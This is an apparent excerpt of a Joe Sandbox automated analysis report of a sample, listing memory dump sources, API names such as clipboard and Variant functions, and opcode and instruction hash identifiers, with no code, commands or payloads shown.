                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FDA00239E5C40197CA08CF20A854871E2BA6B5F204FA134288106B7C52D951D500854C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                        • Instruction ID: 70204a4f19da818e306c590333116dd845209fb171f96af6639338c1a50bb7b2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 38B00254855145D6D704CF10D905575F270BF43705F10F655A40437160D3B4C248870E
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                        • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                        • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                        • Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                        • Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                        • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                        • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                        • Opcode ID: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                        • Instruction ID: 77670fa70b7239dd6c969a02742a9b054482ade36e98dbb7d067dbac13b9bcf6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1341807150C7818ED301EF7C998835FBEE09F86315F094A7EE4EA86392D6788549C7A3
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                        • String ID: L
                                                                                                                                                                                                                                        • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                        • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                        • Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                        • String ID: L
                                                                                                                                                                                                                                        • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                        • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                        • Instruction ID: 71a6db8cdb21138a0e3d9f8b2613aa4c196904c9dd3c12a9224bd777620ab77e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2441297110CBC18ED331DB38845865EBFE1ABE6220F188A9DE5F5873E2D674854ACB53
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: MetricsSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                        • Opcode ID: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                        • Instruction ID: c9a1f8c58fc854c7343cd62f2f50c2794f568aca7ada01e3bbf97962732916ca
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB3183B09143048FDB40EF69E98965EBBF4BB88304F01853EE499DB360D7749948CF86